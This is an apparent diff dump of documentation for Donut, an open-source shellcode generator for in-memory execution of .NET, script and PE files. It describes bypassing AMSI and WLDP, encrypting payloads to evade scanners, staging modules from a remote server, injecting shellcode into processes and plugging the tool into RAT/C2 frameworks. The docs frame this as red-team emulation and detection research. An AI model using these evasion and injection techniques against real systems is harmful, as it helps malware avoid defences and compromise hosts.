218 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
219 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
220 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
221 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
222 * payload/http_client.c: Downloads a module from remote staging server into memory.
223 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
224 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
225 * payload/inject.exe: The compiled C shellcode injector
226 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
227 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
228 * payload/runsc.exe: The compiled C shellcode runner
229 * payload/exe2h/exe2h.c: Source code for exe2h
230 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
231 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
232 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
233
234 # Subprojects
235
236 There are three companion projects provided with donut:
237
238 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
239 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
240 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
241 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
242
243 # Project plan
244
245 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
246 * Create a C# version of the generator.
247 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
248 * Add support for HTTP proxies.
249 ~~* Find ways to simplify the shellcode if possible.~~
250 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
251 * ~~Dynamic Calls to DLL functions.~~
252 * Handle the ProcessExit event from AppDomain using unmanaged code.
0 [![Issues](https://img.shields.io/github/issues/thewover/donut)](https://github.com/TheWover/donut/issues)
1 [![Contributors](https://img.shields.io/github/contributors/thewover/donut)](https://github.com/TheWover/donut/graphs/contributors)
2 [![Stars](https://img.shields.io/github/stars/thewover/donut)](https://github.com/TheWover/donut/stargazers)
3 [![Forks](https://img.shields.io/github/forks/thewover/donut)](https://github.com/TheWover/donut/network/members)
4 [![License](https://img.shields.io/github/license/thewover/donut)](https://github.com/TheWover/donut/blob/master/LICENSE)
5 [![Chat](https://img.shields.io/badge/chat-%23donut-orange)](https://bloodhoundgang.herokuapp.com/)
6 [![Github All Releases](https://img.shields.io/github/downloads/thewover/donut/total.svg)](http://www.somsubhra.com/github-release-stats/?username=thewover&repository=donut)
7 [![Twitter URL](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https://github.com/TheWover/donut&text=%23Donut+An+open-source+shellcode+generator+that+supports+in%2Dmemory+execution+of+VBS%2FJS%2FEXE%2FDLL+files:+https://github.com/TheWover/donut)
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
10
11 <p>Current version: <a href="https://thewover.github.io/TBD/">v0.9.3</a> <em>please submit issues and requests for v1.0 release</em></p>
12
13 <h2>Table of contents</h2>
14
15 <ol>
16 <li><a href="#intro">Introduction</a></li>
17 <li><a href="#how">How It Works</a></li>
18 <li><a href="#build">Building</a></li>
19 <li><a href="#usage">Usage</a></li>
20 <li><a href="#subproj">Subprojects</a></li>
21 <li><a href="#add">Additional Features</a></li>
22 <li><a href="#qad">Questions and Discussions</a></li>
23 <li><a href="#disclaimer">Disclaimer</a></li>
24 </ol>
25
26 <h2 id="intro">1. Introduction</h2>
27
28 <p><strong>Donut</strong> is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself. The module is optionally encrypted using the <a href="https://tinycrypt.wordpress.com/2017/02/20/asmcodes-chaskey-cipher/">Chaskey</a> block cipher and a 128-bit randomly generated key. After the file is loaded and executed in memory, the original reference is erased to deter memory scanners. The generator and loader support the following features:</p>
29
30 <ul>
31 <li>Compression of input files with aPLib and LZNT1, Xpress, Xpress Huffman via RtlCompressBuffer.</li>
32 <li>Using entropy for API hashes and generation of strings.</li>
33 <li>128-bit symmetric encryption of files.</li>
34 <li>Patching Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP).</li>
35 <li>Patching command line for EXE files.</li>
36 <li>Patching exit-related API to avoid termination of host process.</li>
37 <li>Multiple output formats: C, Ruby, Python, PowerShell, Base64, C#, Hexadecimal.</li>
38 </ul>
39
40 <p>There are dynamic and static libraries for both Linux and Windows that can be integrated into your own projects. There's also a python module which you can read more about in <a href="https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md">Building and using the Python extension.</a></p>
41
42 <h2 id="how">2. How It Works</h2>
43
44 <p>Donut contains individual loaders for each supported file type. For dotNET EXE/DLL assemblies, Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. Once the CLR is loaded into the host process, a new Application Domain is created to allow for running Assemblies in disposable AppDomains. When the AppDomain is ready, the dotNET Assembly is loaded via the AppDomain.Load_3 method. Finally, the Entry Point for EXEs or public method for DLLs specified by the user is invoked with any additional parameters. Refer to MSDN for documentation on the <a href=" https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces">Unmanaged CLR Hosting API.</a> For a standalone example of a CLR Host, refer to <a href="https://github.com/TheWover/donut/blob/master/DonutTest/rundotnet.cpp">code here.</a></p>
45
46 <p>VBScript and JScript files are executed using the IActiveScript interface. There's also minimal support for some of the methods provided by the Windows Script Host (wscript/cscript). For a standalone example, refer to <a href="https://gist.github.com/odzhan/d18145b9538a3653be2f9a580b53b063">code here.</a> For a more detailed description, read: <a href="https://modexp.wordpress.com/2019/07/21/inmem-exec-script/">In-Memory Execution of JavaScript, VBScript, JScript and XSL</a></p>
47
48 <p>Unmanaged or native EXE/DLL files are executed using a custom PE loader with support for Delayed Imports, TLS and patching the command line. Only files with relocation information are supported. Read <a href="https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/">In-Memory Execution of DLL</a> for more information.</p>
49
50 <p>The loader can disable AMSI and WLDP to help evade detection of malicious files executed in-memory. For more information, read <a href="https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/">How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code</a>. It also supports decompression of files in memory using aPLib or the RtlDecompressBufferEx API. Read <a href="https://modexp.wordpress.com/2019/12/08/shellcode-compression/">Data Compression</a> for more information.</p>
51
52 <p>For a detailed walkthrough using the generator and how Donut affects tradecraft, read <a href="https://thewover.github.io/Introducing-Donut/">Donut - Injecting .NET Assemblies as Shellcode</a>. For more information about the loader, read <a href="https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/">Loading .NET Assemblies From Memory</a>.</p>
53
54 <p>Those who wish to know more about the internals should refer to <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">Developer notes.</a></p>
55
56 <h2 id="build">3. Building</h2>
57
58 <p>There are two types of build. If you want to debug Donut, please refer to <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">documentation here</a>. If not, continue reading for the release build.</p>
59
60 <h3>Clone</h3>
61
62 <p>From a Windows command prompt or Linux terminal, clone the repository.</p>
63
64 <pre>
65 git clone http://github.com/thewover/donut.git
66 </pre>
67
68 <p>The next step depends on your operating system and what compiler you decide to use. Currently, the generator and loader template for Donut can be compiled successfully with both Microsoft Visual Studio 2019 and MingGW-64. To use the libaries in your own C/C++ project, please refer to the <a href="https://github.com/TheWover/donut/tree/master/examples">examples provided here.</a></p>
69
70 <h4>Windows</h4>
71
72 <p>To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:</p>
73
74 <pre>
75 nmake -f Makefile.msvc
76 </pre>
77
78 <p>To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:</p>
79
80 <pre>
81 make -f Makefile.mingw
82 </pre>
83
84 <h4>Linux</h4>
85
86 <p>To generate the dynamic library donut.so, the static library donut.a and the generator donut. Change to the directory where you cloned the Donut repository and simply type make.</p>
87
88 <h3>Python Module</h3>
89
90 <p>Donut can be installed and used as a Python module. To install from source requires pip for Python3. First, ensure older versions of donut-shellcode are not installed by issuing the following command on Linux terminal or Microsoft Visual Studio command prompt.</p>
91
92 <pre>
93 pip3 uninstall donut-shellcode
94 </pre>
95
96 <p>After you confirm older versions are no longer installed, issue the following command.</p>
97
98 <pre>
99 pip3 install .
100 </pre>
101
102 <p>You may also install Donut as a Python module by grabbing it from the PyPi repository.</p>
103
104 <pre>
105 pip3 install donut-shellcode
106 </pre>
107
108 <p>For more information, please refer to <a href="https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md">Building and using the Python extension.</a></p>
109
110 <h3>Releases</h3>
111
112 <p>Tags have been provided for each release version of Donut that contain the compiled executables.</p>
113
114 <ul>
115 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.3">v0.9.3, TBD</a></li>
116 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.2">v0.9.2, Bear Claw</a></li>
117 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.1">v0.9.1, Apple Fritter</a></li>
118 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9">v0.9.0, Initial Release</a></li>
119 </ul>
120
121 <p>Currently, there are two other generators available.</p>
122
123 <ul>
124 <li><a href="https://github.com/n1xbyte/donutCS">C# generator by n1xbyte</a></li>
125 <li><a href="https://github.com/Binject/go-donut">Go generator by awgh</a></li>
126 </ul>
127
128 <h2 id="usage">4. Usage</h2>
129
130 <p>The following table lists switches supported by the command line version of the generator.</p>
131
132 <table border="1">
133 <tr>
134 <th>Switch</th>
135 <th>Argument</th>
136 <th>Description</th>
137 </tr>
138
139 <tr>
140 <td>-a</td>
141 <td>arch</td>
142 <td>Target architecture for loader : 1=x86, 2=amd64, 3=x86+amd64(default).</td>
143 </tr>
144
145 <tr>
146 <td>-b</td>
147 <td>level</td>
148 <td>Behavior for bypassing AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)</td>
149 </tr>
150
151 <tr>
152 <td>-c</td>
153 <td>class</td>
154 <td>Optional class name. (required for .NET DLL) Can also include namespace: e.g <em>namespace.class</em></td>
155 </tr>
156
157 <tr>
158 <td>-d</td>
159 <td>name</td>
160 <td>AppDomain name to create for .NET. If entropy is enabled, one will be generated randomly.</td>
161 </tr>
162
163 <tr>
164 <td>-e</td>
165 <td>level</td>
166 <td>Entropy level. 1=None, 2=Generate random names, 3=Generate random names + use symmetric encryption (default)</td>
167 </tr>
168
169 <tr>
170 <td>-f</td>
171 <td>format</td>
172 <td>The output format of loader saved to file. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=PowerShell, 7=C#, 8=Hexadecimal</td>
173 </tr>
174
175 <tr>
176 <td>-m</td>
177 <td>name</td>
178 <td>Optional method or function for DLL. (a method is required for .NET DLL)</td>
179 </tr>
180
181 <tr>
182 <td>-n</td>
183 <td>name</td>
184 <td>Module name for HTTP staging. If entropy is enabled, one is generated randomly.</td>
185 </tr>
186
187 <tr>
188 <td>-o</td>
189 <td>path</td>
190 <td>Specifies where Donut should save the loader. Default is "loader.bin" in the current directory.</td>
191 </tr>
192
193 <tr>
194 <td>-p</td>
195 <td>parameters</td>
196 <td>Optional parameters/command line inside quotations for DLL method/function or EXE.</td>
197 </tr>
198
199 <tr>
200 <td>-r</td>
201 <td>version</td>
202 <td>CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.</td>
203 </tr>
204
205 <tr>
206 <td>-s</td>
207 <td>server</td>
208 <td>URL for the HTTP server that will host a Donut module.</td>
209 </tr>
210
211 <tr>
212 <td>-t</td>
213 <td>N/A</td>
214 <td>Create new thread for entrypoint of unmanaged EXE.</td>
215 </tr>
216
217 <tr>
218 <td>-w</td>
219 <td>N/A</td>
220 <td>Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)</td>
221 </tr>
222
223 <tr>
224 <td>-x</td>
225 <td>option</td>
226 <td>Determines how the loader should exit. 1=exit thread (default), 2=exit process.</td>
227 </tr>
228
229 <tr>
230 <td>-y</td>
231 <td>addr</td>
232 <td>Creates a new thread for the loader and continues execution at the address of host process.</td>
233 </tr>
234
235 <tr>
236 <td>-z</td>
237 <td>engine</td>
238 <td>Pack/Compress the input file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress, 5=Xpress Huffman. Currently, the last three are only supported on Windows.</td>
239 </tr>
240 </table>
241
242 <h2 id="subproj">5. Subprojects</h2>
243
244 <p>There are four companion projects provided with donut:</p>
245
246 <table border="1">
247 <tr>
248 <th>Tool</th>
249 <th>Description</th>
250 </tr>
251 <tr>
252 <td>DemoCreateProcess</td>
253 <td>A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.</th>
254 </tr>
255 <tr>
256 <td>DonutTest</td>
257 <td>A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.</th>
258 </tr>
259 <tr>
260 <td>ModuleMonitor</td>
261 <td>A proof-of-concept tool that detects CLR injection as it is done by tools such as Donut and Cobalt Strike's execute-assembly.</th>
262 </tr>
263 <tr>
264 <td>ProcessManager</td>
265 <td>A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. </th>
266 </tr>
267 </table>
268
269 <h2 id="add">6. Additional Features</h2>
270
271 <p>These are left as exercises to the reader. I would personally recommend:</p>
272
273 <ul>
274 <li>Add environmental keying.</li>
275 <li>Make Donut polymorphic by obfuscating the loader every time shellcode is generated.</li>
276 <li>Integrate Donut as a module into your favorite RAT/C2 Framework.</li>
277 </ul>
278
279 <h2 id="qad">7. Questions and Discussion</h2>
280
281 <p>If you have any questions or comments about Donut. Join the #Donut channel in the <a href="https://bloodhoundgang.herokuapp.com/">BloodHound Gang Slack</a></p>
282
283 <h2 id="disclaimer">8. Disclaimer</h2>
284
285 <p>We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. In the event EDR or AV products are capable of detecting Donut via signatures or behavioral patterns, we will not update Donut to counter signatures or detection methods. To avoid being offended, please do not ask.</p>
286
3434
3535 The ```donut``` module exposes only one function ```create()```, which is used to generate shellcode and accepts both positional and keyword arguments.
3636
37 The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS/XSL file to turn into shellcode.
37 The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS file to turn into shellcode.
3838
3939 ```python
4040 import donut
4242 shellcode = donut.create(
4343 file='naga.exe', # .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory
4444 url='http://127.0.0.1', # HTTP server that will host the donut module
45 arch=1, # Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default)
46 bypass=3, # Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
45 arch=1, # Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default)
46 bypass=3, # Bypass AMSI/WLDP : 1=none, 2=abort on fail, 3=continue on fail.(default)
4747 cls='namespace.class', # Optional class name. (required for .NET DLL)
4848 method='method', # Optional method or API name for DLL. (method is required for .NET DLL)
49 params='arg1,arg2', # Optional parameters or command line, separated by comma or semi-colon.
49 params='arg1 arg2', # Optional parameters or command line.
5050 runtime='version', # CLR runtime version. MetaHeader used by default or v4.0.30319 if none available
5151 appdomain='name' # AppDomain name to create for .NET. Randomly generated by default.
5252 )
5353 ```
5454
55 ## Keywords
56
57 The following table lists key words for the create method.
58
59 <table>
60 <tr>
61 <th>Keyword</th>
62 <th>Type</th>
63 <th>Description</th>
64 </tr>
65 <tr>
66 <td>file</td>
67 <td>String</td>
68 <td>The path of file to execute in memory. VBS/JS/EXE/DLL files are supported.</td>
69 </tr>
70 <tr>
71 <td>arch</td>
72 <td>Integer</td>
73 <td>Indicates the type of assembly code to generate. 1=<code>DONUT_ARCH_X86</code> and 2=<code>DONUT_ARCH_X64</code> are self-explanatory. 3=<code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both X86 and AMD64. ARM64 will be supported at some point.</td>
74 </tr>
75 <tr>
76 <td>bypass</td>
77 <td>Integer</td>
78 <td>Specifies behaviour of the code responsible for bypassing AMSI and WLDP. The current options are 1=<code>DONUT_BYPASS_NONE</code> which indicates that no attempt be made to disable AMSI or WLDP. 2=<code>DONUT_BYPASS_ABORT</code> indicates that failure to disable should result in aborting execution of the module. 3=<code>DONUT_BYPASS_CONTINUE</code> indicates that even if AMSI/WDLP bypasses fail, the shellcode will continue with execution.</td>
79 </tr>
80 <tr>
81 <td>compress</td>
82 <td>Integer</td>
83 <td>Indicates if the input file should be compressed. Available engines are 1=<code>DONUT_COMPRESS_NONE</code>, 2=<code>DONUT_COMPRESS_APLIB</code> to use the <a href="http://ibsensoftware.com/products_aPLib.html">aPLib</a> algorithm. For builds on Windows, the <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcompressbuffer">RtlCompressBuffer</a> API is available and supports 3=<code>DONUT_COMPRESS_LZNT1</code>, 4=<code>DONUT_COMPRESS_XPRESS</code> and 5=<code>DONUT_COMPRESS_XPRESS_HUFF</code>.</td>
84 </tr>
85 <tr>
86 <td>entropy</td>
87 <td>Integer</td>
88 <td>Indicates whether Donut should use entropy and/or encryption for the loader to help evade detection. Available options are 1=<code>DONUT_ENTROPY_NONE</code>, 2=<code>DONUT_ENTROPY_RANDOM</code>, which generates random strings and 3=<code>DONUT_ENTROPY_DEFAULT</code> that combines <code>DONUT_ENTROPY_RANDOM</code> with symmetric encryption.</td>
89 </tr>
90 <tr>
91 <td>format</td>
92 <td>Integer</td>
93 <td>Specifies the output format for the shellcode loader. Supported formats are 1=<code>DONUT_FORMAT_BINARY</code>, 2=<code>DONUT_FORMAT_BASE64</code>, 3=<code>DONUT_FORMAT_RUBY</code>, 4=<code>DONUT_FORMAT_C</code>, 5=<code>DONUT_FORMAT_PYTHON</code>, 6=<code>DONUT_FORMAT_POWERSHELL</code>, 7=<code>DONUT_FORMAT_CSHARP</code> and 8=<code>DONUT_FORMAT_HEX</code>. On Windows, the base64 string is copied to the clipboard.</td>
94 </tr>
95 <tr>
96 <td>exit_opt</td>
97 <td>Integer</td>
98 <td>When the shellcode ends, <code>RtlExitUserThread</code> is called, which is the default behaviour. Use 2=<code>DONUT_OPT_EXIT_PROCESS</code> to terminate the host process via the <code>RtlExitUserProcess</code> API.</td>
99 </tr>
100 <tr>
101 <td>thread</td>
102 <td>Integer</td>
103 <td>If the file is an unmanaged EXE, the loader will run the entrypoint as a thread. The loader also attempts to intercept calls to exit-related API stored in the Import Address Table by replacing those pointers with the address of the <code>RtlExitUserThread</code> API. However, hooking via IAT is generally unreliable and Donut may use code splicing / hooking in the future.</td>
104 </tr>
105 <tr>
106 <td>oep</td>
107 <td>String</td>
108 <td>Tells the loader to create a new thread before continuing execution at the OEP provided by the user. Address should be in hexadecimal format.</td>
109 </tr>
110 <tr>
111 <td>output</td>
112 <td>String</td>
113 <td>The path of where to save the shellcode/loader. Default is "loader.bin".</td>
114 </tr>
115 <tr>
116 <td>runtime</td>
117 <td>String</td>
118 <td>The CLR runtime version to use for a .NET assembly. If none is provided, Donut will try reading from the PE's COM directory. If that fails, v4.0.30319 is used by default.</td>
119 </tr>
120 <tr>
121 <td>appdomain</td>
122 <td>String</td>
123 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
124 </tr>
125 <tr>
126 <td>cls</td>
127 <td>String</td>
128 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</td>
129 </tr>
130 <tr>
131 <td>method</td>
132 <td>String</td>
133 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
134 </tr>
135 <tr>
136 <td>params</td>
137 <td>String</td>
138 <td>List of parameters for the .NET method or DLL function. For unmanaged EXE files, a 4-byte string is generated randomly to act as the module name. If entropy is disabled, this will be "AAAA"</td>
139 </tr>
140 <tr>
141 <td>unicode</td>
142 <td>Integer</td>
143 <td>By default, the <code>params</code> string is passed to an unmanaged DLL function as-is, in ANSI format. If set, param is converted to UNICODE.</td>
144 </tr>
145 <tr>
146 <td>url or server</td>
147 <td>String</td>
148 <td>If the instance type is <code>DONUT_INSTANCE_HTTP</code>, this should contain the server and path of where module will be stored. e.g: https://www.staging-server.com/modules/</td>
149 </tr>
150 <tr>
151 <td>modname</td>
152 <td>String</td>
153 <td>If the type is <code>DONUT_INSTANCE_HTTP</code>, this will contain the name of the module for where to save the contents of <code>mod</code> to disk. If none is provided by the user, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
154 </tr>
155 </table>
156
55157 ## Author
56158
57159 The Python extension was written by [@byt3bl33d3r](https://twitter.com/byt3bl33d3r)
+0
-511
docs/api.html
0
1 <html>
2 <body>
3
4 <h3>API</h3>
5
6 <ul>
7 <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li>
8 <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li>
9 </ul>
10
11 <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p>
12
13 <ol>
14 <li>An encrypted <var>Instance</var></li>
15 <li>An encrypted <var>Module</var></li>
16 <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li>
17 </ol>
18
19 <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p>
20
21 <h3>Configuration</h3>
22
23 <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p>
24
25 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
26 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span>
27 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span>
28 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span>
29 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span>
30 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span>
31 <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span>
32 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span>
33 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span>
34 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span>
35
36 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span>
37 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
38 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span>
39
40 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span>
41 uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
42 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span>
43
44 uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span>
45 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span>
46 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
47 </pre>
48
49 <table border="1">
50 <tr>
51 <th>Member</th>
52 <th>Description</th>
53 </tr>
54 <tr>
55 <td><code>arch</code></td>
56 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td>
57 </tr>
58 <tr>
59 <td><code>domain</code></td>
60 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td>
61 </tr>
62 <tr>
63 <td><code>cls</code></td>
64 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
65 </tr>
66 <tr>
67 <td><code>method</code></td>
68 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
69 </tr>
70 <tr>
71 <td><code>param</code></td>
72 <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td>
73 </tr>
74 <tr>
75 <td><code>file</code></td>
76 <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td>
77 </tr>
78 <tr>
79 <td><code>url</code></td>
80 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/</td>
81 </tr>
82 <tr>
83 <td><code>runtime</code></td>
84 <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default.</td>
85 </tr>
86 <tr>
87 <td><code>modname</code></td>
88 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td>
89 </tr>
90 <tr>
91 <td><code>mod_type</code></td>
92 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
93 </tr>
94 <tr>
95 <td><code>mod_len</code></td>
96 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
97 </tr>
98 <tr>
99 <td><code>mod</code></td>
100 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
101 </tr>
102 <tr>
103 <td><code>inst_type</code></td>
104 <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td>
105 </tr>
106 <tr>
107 <td><code>inst_len</code></td>
108 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
109 </tr>
110 <tr>
111 <td><code>inst</code></td>
112 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
113 </tr>
114 <tr>
115 <td><code>pic_len</code></td>
116 <td>The size of data pointed to by <code>pic</code>.</td>
117 </tr>
118 <tr>
119 <td><code>pic</code></td>
